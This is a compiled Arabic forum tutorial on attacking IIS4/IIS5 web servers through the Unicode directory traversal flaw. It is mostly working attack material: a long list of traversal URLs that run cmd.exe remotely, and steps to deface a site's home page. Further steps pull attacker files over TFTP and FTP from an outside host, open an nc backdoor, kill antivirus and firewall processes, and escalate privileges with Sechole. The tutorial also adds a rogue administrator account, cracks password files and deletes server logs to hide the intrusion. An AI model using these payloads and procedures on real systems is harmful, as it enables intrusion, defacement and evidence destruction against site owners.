بسم الله الرحمن الرحيم
" الإختراق عن طريق اليونيكود (الجزء الأول) "
<منقول>
<الكاتب: sNiper_hEx>
يحتوى الدرس الاول على ( 13 نقطة ) وهي كما يلي :-
- تعريف باليونيكود .
- تاريخ ظهور هذه الثغرة .
- كيفية ايجاد هذه الثغرات .
- كيف يتم استغلال ثغرات اليونكود .
- الاوامر المستخدمة بواسطة ملف CMD .
- طريقة تطبيق هذه الثغرات .
- كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
- طريقة نسخ ملف الـ CMD لاتاحة امكانية الكتابة على الملفات .
- كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها .
- كيفية عمل اكاونت للدخول بواسطة الـFTP .
- طريقة كشف باسورد الادمينستريتور .
- تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج TFTP .
- مسح ملفات اللوق حتى لا يتم التعرف عليك .
- تعريف باليونيكود .
اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع IIS4.0 / IIS5.0 والذي ياتي عادة مع NT4 / Win2k .
- تاريخ ظهور هذه الثغرة .
لايوجد تاريخ محدد لظهور اول ثغرة لليونيكود لذا يعتبر ظهورها بواسطة شخص مجهول anonymous person ، وقيل ان اول ظهور لثغرات اليونيكود كانت بواسطة الصينين ولكن لايوجد مايثبت صحة هذا الكلام لهذه الثغرات ، فتم استغلال هذه الثغرات من قبل المخترقين وتطوير البرامج اللازمة لها .
- كيفية ايجاد هذه الثغرات .
يتم ايجاد هذه الثغرات بطريقتين :-
1- بواسطة البرامج اللازمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس .
2- بواسطة تطبيق الثغرة على الموقع مباشرة .
- كيف يتم استغلال ثغرات اليونكود .
عند تطبيق الثغرة على نظام الـ IIS4 / IIS5 يبدا ملف CMDبفك شفرة اليونكود في المثال الخطاء ومن هنا يتم استغلالها .
- الاوامر المستخدمة بواسطة ملف CMD .
الاوامر المستخدمه بواسطة ملف الـCMD وهي امر لانشاء دليل جديد وامر لالغاء دليل وامر النسخ وامر النقل وامر الحذف وامر تغيير اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة داخل أي ملف وامر لسحب أي ملف ، وهي حسب الامثلة التالية :-
امر انشاء دليل جديد:
http://www.xxxx.com/msadc/..%c0%af.....e?/c+md+c:\hEx امر الغاء دليل:
http://www.xxxx.com/msadc/..%c0%af.....e?/c+rd+c:\hEx للمعلومية:لايمكن الغاء أي دليل الا اذا كان فارغاً تمام من الملفات والمجلدات
الامر المستخدم للنسخ:
http://www.xxxx.com/msadc/..%c0%af.....cripts\hEx.exeالامر المستخدم للنقل:
http://www.xxxx.com/msadc/..%c0%af.....ts\hEx.exe+c:\الامر المستخدم للحذف:
http://www.xxxx.com/msadc/..%c0%af.....del+c:\hEx.mdb الامر المستخدم لتغيير مسمى الملفات:
http://www.xxxx.com/msadc/..%c0%af.....ex.htm+hEx.htmالامر المستخدم لرؤية محتويات الملف:
http://www.xxxx.com/msadc/..%c0%af.....ype+c:\hEx.txtالامر المستخدم للكتابة داخل أي ملف:
http://www.xxxx.com/msadc/..%c0%af../winnt/system32/cmd.exe?/c+echo+sNiper_hEx+>c:\hEx.txtالامر المستخدم لعملية سحب أي ملف:
عليك القيام اولاً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي:
http://www.xxxx.com/msadc/hEx.mdb- طريقة تطبيق هذه الثغرات .
تطبيق الثغرة على الموقع من خلال المتصفح تتم حسب الامثلة التالية :-
http://www.xxxx.com/scripts/..%c1%1c...exe?/c+dir+c:\http://www.xxxx.com/scripts/..%c0%9v...exe?/c+dir+c:\http://www.xxxx.com/scripts/..%c0%af...exe?/c+dir+c:\http://www.xxxx.com/scripts/..%c0%qf...exe?/c+dir+c:\http://www.xxxx.com/scripts/..%c1%8s...exe?/c+dir+c:\http://www.xxxx.com/scripts/..%c1%9c...exe?/c+dir+c:\http://www.xxxx.com/scripts/..%c1%pc...cmd.exe?/c+dir +c:\
وقد نحتاج الى تغيير مسمى الدليل بحيث يكون :-
Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin
- كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
في حالة اكتشاف موقع يعاني من مشكلة اليونيكود ولنفترض انه كان على هذه الثغرة :-
http://www.xxxx.com/msadc/..%c0%af.....exe?/c+dir+c:\فنحتاج الى نسخ ملف w3svc.exe الى مجلد inetpub\scripts والامر يكون بهذه الطريقة :-
http://www.xxxx.com/msadc/..%c0%af.....ipts\w3svc.exeبعد نسخ ملف w3svc.exe الى مجلد inetpub\scripts ، الان نقوم بتصفح الموقع من خلال الثغرة بهذه الطريقة :-
http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c:\الان نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل
inetpub\wwwroot\index.htm بحيث يكون الامر بالشكل التالي :-
http://www.xxxx.com/scripts/w3svc.exe?/c+echo+Hacked+By+sNiper_hEx+hExRay@Hotmail.com+>+c :\inetpub\wwwroot\index.htm
- طريقة نسخ ملف الـCMD لاتاحة امكانية الكتابة على الملفات .
الغرض من نسخ ملف الـCMD وهو لاعطاء امكانية للكتابة داخل السيرفر في بعض الحالات ويتم نسخه الى مجلد السيكربت بهذه الطريقة :-
http://www.xxxx.com/msadc/..%c0%af.....ripts\cmd1.exeالان بامكاننا استخدام ملف الـCMD الجديد في الثغرة بدلا من الاول بهذا الشكل :-
http://www.xxxx.com/msadc/..%c0%af......exe?c+dir+c:\- كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها .
تتم معرفة مشكلة الـAccess Denied من خلال المحاولة في حذف أي ملف من أي امتداد ، فعند ظهور رسالة الـ Access Denied فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم اكثر على السيرفر :-
1- الطريقة الاولى نسخ ملف الـ CMD الى دليل السيكربت بمسمى CMD1 فسوف يتاح لك امكانية الكتابة باستخدام الامر Copy باستخدام هذا الامر :-
http://www.xxxx.com/msadc/..%c0%af.....ripts\cmd1.exe2- الطريقة الثانية بالتعامل مع الملف ssinc.dll والطريقة كما يلي :-
o اولا انشاء صفحة باسم test.shtml
o تكون هذه الصفحة داخل مجلد wwwroot/hEx/test.shtml
o كتابة هذا الكود داخل الصفحة <!--#include file="AAAA[...]AA"--> بحيث ان حرف A يتم كتابتة حتى يتعدى 2049 حرف .
o الان يتم طلب الصفحة من خلال المتصفح
http://www.xxxx.com/test.shtmlo الان سوف تظهر لك الصفحة .
o الان تستطيع الكتابه وتم تخطي مشكلة الـAccess Denied .
o اذا ظهرت لك صفحة الخطاء رقم 500 فمعناها انك لم تقم بتطبيق الطريقة بالشكل الصحيح وعليك اعادة المحاولة .
3- الطريقة الثالثة باستخدام برنامج NC.exe بحيث يتم عمل اب لوود لهذا الملف داخل مجلد الـTemp في دليل الويندوز ومنه يتم تنفيذ الاوامر من خلال موجة الدوز وللمعلومية مجلد الـTemp مفتوح لعمليات الاب لوود .
4- الطريقة الرابعة وهي من خلال عمل كراش للسيرفر باستخدام البرامج اللازمة لهذا الغرض وهذه الطريقة غير مجديه في كثير من الاحيان .
5- البحث عن ملفات : root.exe ، sensepost.exe ، shell.exe ، w3svc.exe ونسخها الى مجلد c:\inetpub\scripts وتطبيق الثغرة من خلالها .
- كيفية عمل اكاونت للدخول بواسطة الـFTP .
1- نسخ ملف CMD الى مجلد Scripts باسم Shell.exe حتى يتم الاستفادة من ثغرة قديمة
/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\script s\shell.exe
2- انشاء ملف mspft.pll بواسطة الامر Echo وكتابة فيه التالي open
ftp.host.com حيث ان هذا هو الخادم للـFTP .
/c+echo+open+
ftp.host.com+>+c:\winnt\mspft.ppl3- الان مطلوب اضافة مجهول Anonymous الى نفس الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl
4- الان مطلوب ادراج البريد
hExRay@Hotmail.Com الى نفس الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl
5- إضافة User قبل Anonymous لزوم الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl
6- الان تكرار لحاجة الاعداد
/shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl
7- يتم هنا ادراج الموقع الحالي للملفات
/shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft.pp l
8- الان يكتب اوامر الـFTP اللازمة لسحب الملف من خادم الـFTP وهي Get index.htm ثم يدرج هنا بدون المسج السابق
/shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl
9- هنا نفس السابق ولكن باضافة Quit
/shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl
10- الان يتم تنفيذ امر
FTP.exe?+"-s:c:winnt\mspft.ppl” وهو عبارة عن خطوات قمنا بانشاءها وموجودة في ملف mspft.ppl باحتوائها على مايلي :-
- Open
FTP.host.com- Anonymous
-
hEx@Hotmail.Com- User Anonymous
-
hEx@Hotmail.Com- Get index.html
- Quit
/msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl"
- طريقة كشف باسورد الادمينستريتور .
نحتاج الى وجود برنامجين ( Microsoft Access – L0phtCrack ) وهي لزوم تنفيذ بعض الخطوات لتالية وهي :-
- باسورد الادمينستيتور للسيرفر يكون موجود في ملف الـ SAM._ في دليل \winnt\repair\ وافضل برنامج لفك شفرة الباسورد هو برنامج L0phtCrack
- اذا كان هناك مستخدمين في السيرفر ويوجد لديهم حساب فان معلوماتهم سوف تكون في ملف PASSFILT.DLL ونستطيع تحديد مسار هذا الملف من خلال الريجستري بواسطة هذا المفتاح :-
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Lsa\SYSTEM32\PASSFILT.DLL
- اذا كان السيرفر يعتمد في القراءة باستخدام صفحات الـ ASP للوصول الى البيانات من خلال قاعدة الـ MySQL فسوف نحتاج الى تطبيق ثغرة ( +.htr ) للوصول الى باسورد المسئول عن هذة القاعده وهي كالتالي :-
http://www.xxxx.com/default.asp+.htrعند ظهور صفحة الخطا في الوصول الى الصفحة المطلوبة وبالتحديد في سيكربت التنفيذ فالطريقة صحيحة وماعلينا فقط سوى سحب ملف database.inc وقراءة محتوياته للعثور على اسم المستخدم والباسورد للمسئول عن قاعدة البيانات .
- تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج TFTP .
1- قم بانشاء صفحة وضع شعارك عليها واحفظها باسم index.htm على الـ c:\
2- قم بتشغيل برنامج TFTP ونفذ الامر في الفقرة التالية .
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index. htm
- مسح ملفات اللوق حتى لا يتم التعرف عليك .
وتتم هذه العملية من خلال حذف ملفات الـ Log من مجلد System32 بواسطة الامر :-
/c+del+c:/winnt/system32/logfiles/*.log
انتهى ،،،
" الإختراق عن طريق اليونيكود (الجزء الثاني) "
<منقول من منتديات شبكة الحزم الإسلامية>
في الدرس الأول كان عبارة عن اوامر اساسية يستطيع الجميع تطبيقها .. اما في هذا الدرس فالأمر يتطلب بعض الذكاء والمهارة ..
البداية :
--------------
عند وجود موقع مصاب بثغرة ما (يونيكود) فان اول شي عليك القيام به هو نسخ مجلد cmd الى cmd1 بهذه الطريقة :
C+copy+c:\winnt\system32+
c:\winnt\system32\cmd1.exe والسبب هو تفعيل امر الكتابة Echo ..
وبعد ذلك نفذ الثغرة من الملف الجديد CMD1.exe ( هذا شي يعرفه الجميع ) لكن للتذكير فقط !
الان عند تصفحك لملفات الموقع من المتصفح .. من خلال هذه الثغرة فانه سيكون لديك صلاحيات IWAM_USER وهذا المستخدم هو عبارة عن يوزر ينتمي للمجموعه Guest وهو اليوزر المسؤوول عن تشغيل سيرفر IIS .
وبما انه من مجموعة Guest فهو لا يملك صلاحيات كثيرة !! الا اذا تم اعداده بشكل سيء
لايوجد شي اكثر ادمانا من محاولة الحصول على رووت هذا في انظمة *nix اما في Microsot فالوضع مختلف فإن محاولة الحصول على صلاحيات Administrator ليس بالسهولة التي تتوقعها فرفع الامتيازات بشكل محلي في انظمة مايكروسوفت ممكن فقط بطرق قليلة لا يتعدى عددها اصابع اليد الواحده .. وانا اكتب هذا الموضوع لاشرح كيفية احكام السيطرة على السيرفر والحصول على حساب مكافيء للمدير والتمتع بجميع موارد النظام ..
+ الملفات المطلوبة :
Sechole.exe وملحقاتها .
Kill.exe
Tlist.exe
ncx99.exe
tftpd32.exe
جهز العده ..
لتوفير الوقت جمعتها في مجلد واحد هنا
الان سأشرح عمل كل اداة :
1 - Sechole وهو اقوى استثمار موجود لرفع الامتيازات بشكل محلي .. وطريقة عمله (بشكل مبسط) بأنه يعتمد على صدع في نواة ويندوز ان تي .. يستطيع من خلاله اغتصاب عملية تابعه لمدير النظام يقوم من خلالها برفع امتيازاتك .
2 - Tlist تقوم بعرض جميع العمليات التي تعمل بالخلفيه .. والفائده منها هو اقفال الفايروول + الانتي فايروس
3- Kill.exe عملها متمم للاداة السابقة حيث ستقوم باقفال رقم العملية المستخرج من الاداة السابقة .
3- NCX99 نسخه مطورة من الباكدوور NC ينصت على المنفذ 99
4- TFTP32.exe لنقل الملفات الى السيرفر ..
كل ما سبق كان عبارة عن مقدمه اما العمل الحقيقي سيبدأ الان :
اولا قم برفع جميع الادوات السابق الى السيرفر ..
ثم قم بتشغيل ncx99.exe بهذا الشكل مثلا :
http://target/scripts/..À¯../...c+C:\ncx99.exe بعد ذلك قم بالاتصال بالموقع على البورت 99 ..
ستحصل على سطر اوامر CMD بدون امتيازات = Guest .
الان قم بتشغيل الاداة TLIST .. ستعرض لك جميع العمليات التي تعمل .. قم بالبحث عن رقم العملية PID الخاص بالانتي فايروس ان وجد .. وكذلك اذا وجدت جدار ناري ..
سجل رقم PID الخاص بالانتي فايروس والفايروول على ورقه جانبيه ..
الان قم بقتل الاجراء بالاداة Kill بهذا الشكل : KILL.exe PID .. مكان PID تضع رقم العملية
يسأل البعض ! مالهدف من اقفال الانتي فايروس ؟ الاجابة .. أن التحديثات الاخيرة من انتي فايروس تتعامل مع Sechole على انه باكدور .. والان بعد اتمام العمليات السابقة بنجاح .. قم بتشغيل Sechole.exe من المتصفح .
عندها سيتم رفم امتيازات IWAM_USER الى مجموعه Administrators ..
الان بإمكانك تنفيذه جميع الاوامر بكامل الحريه وبدون اي مشاكل في الصلاحيات Access Denided .
وطبعا اهم شي الكتابة على الصفحه الرئيسية بامر الايكو :
C+Echo+Hacked+by+XDeMoNX+
> +C;\inetpub\wwwroot\index
.htm
ولكن ليس هذا كل شي ..
القراصنه الاذكياء لا يبحثون فقط عن تغيير الصفحه الرئيسية خصوصا اذا كان الموقع مهم او يحتوي على
معلومات او قواعد بيانات ... إلخ
سؤال : هل تستطيع الدخول بهذا اليوزر ؟ IWAM_USER الى اي خدمه مثل تلنت او اف تي بي ؟؟
الاجابة : لا .. صحيح اننا قمنا برفع امتيزاته لكننا لا نملك كلمه المرور ! لانه تكون مسنده بشكل عشوائي .
سيذهب تفكير البعض الى الحصول على ملف السام وكسره هذا ممكن .. لكن يوجد ماهو اسهل .
بما اننا لدينا حساب مكافي لـ Administrator ولكننا لا نملك كلمة المرور . ما رأيك بإضافه يوزر جديد باسمك مع باسورد خاصه بك مع امتيازات المدير ايضا !! قليل من الذكاء والتفكير
قم بانشاء مستند نصي جديد واضف السطر التالي :
net user Demon pass /add && net localgroup administrators Demon /add والان Save as واحفظها باسم add.bat .
توضيح : ما فعلناه سابقا هو انشاء مجلد دفعاتي يقوم بانشاء يوزر جديد Demon وكلمة مرور Pass واضافته الى مجموعة الادمنستريتورز المدراء ..
قم الان برفع الملف add.bat ثم تشغيلها من المتصفح (بواسطة اليونكود)
الان لديك حساب مدير وتستطيع الدخول الى اي خدمه .. اف تي بي او تلنت او نت بيوس او غيرها
لا تنسى في النهاية مسح الاثار واضافة الابواب الخلية الخاصة بك لتسهيل الدخول في المرات القادمه
طبعا لن اتوسع في هذا الجانب لانه ( لكل شيخ طريقة!) وكل واحد له اسلوب في اخفاء ادواته والتحكم في الملفات .
نرجع لنقطة سابقة ..
هل تذكر اني طلبت منك اقفال الفايروول ؟؟ لماذا ؟
لو جربت تنفذ الامر netstat -an من خلال سطر اوامر الان سي .. فانك ستجد من المنافذ ما يسر القلب
90% من السيرفرات اللي دخلتها وكانت محمية بجدران نار وجدت المنفذ 139 فيها مفتوحا بدون حمايه
لذا فان اقفال الفايرول قد يجعل لك اكثر من خيار لاسقاط الهدف
اسف على النحو الاملاء .. والتنسيق الـ أي كلام واختصار المعلومات ايضا .
بالامكان الاستعراض اكثر من ذلك بكثير .. الى درجة الحصول على تحكم رسومي GUI .
لكن لم يكون لدي الوقت الكافي .. اذا وجدت وقت فراغ فسأكتب عن طرق اخرى وادوات اخرى مثل GEtAdmin و Sechole2 وكيفية الحصول على تحكم رسومي بواسطه الاداة WINvnc ..
انتهى،،،
" معلومات عامة عن كيفية الاستفادة من ثغرات اليونيكود "
<منقول>
<الكاتب: بلاك هنتر>
الموضوع يتكلم عن اساليب التحكم في السيرفر عبر اليونيكود مع بعض المتطلبات
الادوات المطلوبه :
1) اداة مسح ثغرات يونيكود
2) برنامج سيرفر TFTPD
3) معرفة جيده باليونيكود
=================================================
=================================================
1) بأمكانك الحصول على ثغرات اليونيكود من العديد من المواقع او من موقعي
http://www.devil2k.com/وهذه مهداه مني انا (( بلاك هنتر ))
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 35%63../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 35%63../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
2) بأمكانك الحصول على برنامج TFTPD من الموقع
http://iisbughelp.4t.com/3) معرفة اليونيكود بسيطه جدا يكفي ان تعرف كيف تستطيع الانتقال عبر الهارديسكات وعبر الملفات
(تعمل عبر المتصفح )
/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\
لقرائه ما بداخل هارديسك \:C
/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+D:\
لقرائه ما بداخل هارديسك \
/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+E:\
لقرائه ما بداخل هارديسك \:E
نقوم بعمل سكان على الموقع لنرى ما به من ثغرات وهنا مثال على ثغرات مبتدأه بالمجلد المطلوب (( اغلب ثغرات اليونيكود تنطلق من هذه المجلدات ))
1)مثال المجلد msadc
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\
2) مثال المجلد _vti_bin
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\
في سيرفرات IIS عند تركيبها (( بشكل عادي )) يكون المجلد الرئيسي للويب تحت اسم معين وهو :
C:\Inetpub\wwwroot
او في المجلد
D:\Inetpub\wwwroot
او في المجلد
E:\Inetpub\wwwroot
في العاده يكون في الهارديسك C ولذلك سأكمل شرحي على انه هناك
ستجد في هذا المجلد عادة جميع المواقع التي على السيرفر
فلو وجدنا ثغرة يونيكود ما ولتكن
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
وأردنا الولوج الى هذا الملف لنرى ما به فسنكتب الثغره هكذا :
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\Inetpub\wwwroot
اذا كان السيرفر يحوي عدة مواقع فستجدها كل موقع باسمه ( ستجدها في مجلدات بداخل مجلد الـ wwwroot ) اما لو كان السيرفر عباره
عن موقع واحد فقط فستجد كافة الملفات في مجلد الـ wwwroot نفسه
في اغلب الظن يقوم الهاكر بتغيير الصفحة الرئيسيه الاولى وعليك ان تعلم انه ليس دائما الصفحة الرئيسيه الاولى تحمل اسم index.htm
هناك عدة تسميات وأختصارات لها وهذه بعضها (( معظمها ))
index.htm
index.asp
default.htm
default.asp
main.htm
main.asp
لنفرض الان اننا وجدنا ان الصفحة الرئيسيه للموقع في مجلدنا wwwroot هي index.htm فكيف سنقوم بتغييرها وهو ما يهمنا تقريبا من عملية
الاختراق هذه
سنقوم اولا بتغيير اسم الملف من index.htm الى اي اسم اخر يخطر ببالك وليكن ss.htm
طبعا سنرسل الامر عبر ثغرة اليونيكود من المتصفح لديك وسنقوم بتغيير الداله c+dir الى الداله c+ren
(( عليك ان تعرف ان الاوامر التي سوتضع هي نفس الاوامر الموجوده في Dos وفي Command Prompt فعليك ان تكون عارفا بما هو الامر المراد استخدامه
المهم ستكتب الثغره هكذا :
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ren+C:\Inetpub\wwwroot\index.htm+ss.htm
وهكذا فقد تم تغيير اسم الصفحة من index.htm الى ss.htm
ارأيتم كم هو سهل ؟
Aيبدو انك ايها المخترق لم تكتفي باغلاق الصفحة الرئيسيه للموقع فانت تريد ان تضع صفحة بموضوع اخر وليكن الموضوع هو
Hacked!!!
فكيف سنرسلها في صفحة index.htm ؟؟
هناك عدة طرق ومنها سأذكر هذه الطريقه وهي عبر الاتصال بمنفذ TFTP الذي ستكون فيه انت في وضع السيرفر والموقع الذي امامك
في وضع الكلاينت
كيف سيتم هذا ؟
اولا قم بتركيب نظام سيرفر TFTP على جهازك ( البرنامج المذكور في اول الموضوع من افضل البرامج وهناك برنامج اخر اكثر احترافا ولكن هذا يكفي )
الان ضع السيرفر الرئيسي في \:C لديك
قم بتصميم صفحة خفيفه وسريعه وسمها index.htm وضعها في \:C
الان نريد ان نرسل للسيرفر الملف الجديد من \:C لدينا الى ملف
C:\inetpub\wwwroot
لا ليس الامر صعبا ففي نظم ميكروسوفت يوجد امر (( هو بالأصح برنامجا منفصلا )) يحمل اسم TFTP وهو عباره عن كلاينت بسيط يستخدم
بروتوكول TFTP وهو بروتوكول بسيط جدا جدا (( يسميه البعض البروتوكول التافه )) يقوم بسحب او ارسال الملفات من والى الجهاز
نحن نريد ان يسحب ملفا من جهازنا فكيف لنا ذلك ؟
طبعا لو كنا في غير اليونيكود لكتبنا توليفة الامر التالي :
tftp.exe -i XXX.XXX.XXX.XXX get index.htm C:\inetpub\wwwroot\index.htm
(( XXX.XXX.XXX.XXX تعني اي بي السيرفر المراد سحب الملف منه ))
في توليفة هذا الامر يقوم الكلاينت بطلب الملف المسمى index.htm ليضعه في جهازه في المجلد wwwroot
ولكن لا تنسى فشكل توليفة الاوامر يختلف من الوضع العادي عن وضع اليونيكود
فما هو الحل ؟
الحل هو ان تحول توليفة الامر الى يونيكود لتضعه في الثغره التي لديك
بعد تحويل الامر الى يونيكود سيصبح شكله كالتالي :
